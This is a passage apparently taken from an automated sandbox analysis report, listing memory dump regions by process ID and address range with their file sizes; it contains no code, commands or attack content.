                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/3512-135-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          572KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/3512-141-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          100KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/3512-139-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          100KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/3512-144-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1.5MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/3512-137-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          572KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/3512-145-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          100KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/3512-146-0x000000006B280000-0x000000006B2A6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          152KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/3512-136-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          572KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/3512-142-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1.5MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/3588-153-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/3596-173-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/3596-238-0x0000000000400000-0x00000000004D8000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          864KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/3664-278-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/3964-148-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/4044-149-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/4180-305-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/4180-314-0x0000000001070000-0x0000000001072000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/4248-373-0x00000000054B0000-0x0000000005AB6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          6.0MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/4248-343-0x0000000000418F06-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/4352-431-0x00000000055F0000-0x00000000055F1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/4380-324-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/4412-325-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/4532-382-0x0000000004CD0000-0x0000000004CD1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/4532-331-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/4544-332-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/4544-347-0x000000001AD90000-0x000000001AD92000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/4624-335-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/4624-387-0x0000000004910000-0x0000000004911000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/4636-367-0x0000000004AF0000-0x0000000004AF1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/4636-336-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/4644-441-0x0000000004980000-0x0000000004981000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/4660-379-0x0000000000418F02-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/4660-433-0x0000000004F50000-0x0000000005556000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          6.0MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/4724-341-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/4736-399-0x00000000020D0000-0x000000000214B000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          492KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/4736-342-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/4736-403-0x0000000000400000-0x00000000004D8000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          864KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/4736-409-0x0000000002180000-0x0000000002255000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          852KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/4852-378-0x0000000000440000-0x00000000004EE000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          696KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/4852-357-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/4852-364-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          64KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/4876-395-0x0000000000450000-0x0000000000451000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/4876-359-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/4876-369-0x0000000002230000-0x0000000002276000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          280KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/4876-439-0x0000000004BC0000-0x00000000051C6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          6.0MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/4940-362-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/5008-370-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/5040-371-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/5052-391-0x000000001AD70000-0x000000001AD72000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/5052-372-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/5068-389-0x0000000001300000-0x00000000013AE000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          696KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/5068-415-0x0000000000E90000-0x0000000000E91000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/5068-448-0x0000000004F50000-0x0000000005556000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          6.0MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/5068-374-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/5144-458-0x000000001B2C0000-0x000000001B2C2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/5200-482-0x0000000002210000-0x0000000002256000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          280KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/5292-487-0x0000000000BC0000-0x0000000000C20000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          384KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/5292-472-0x0000000002580000-0x0000000002581000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/5292-466-0x00000000028B0000-0x00000000028B1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/5304-490-0x0000000000DA0000-0x0000000000EEA000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1.3MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/5304-462-0x0000000002AE0000-0x0000000002B26000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          280KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/5476-476-0x000000001BB70000-0x000000001BB72000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/5640-484-0x000000001BC10000-0x000000001BC12000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/5828-495-0x00000000035A0000-0x00000000035A1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/5828-501-0x0000000003590000-0x0000000003591000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4KB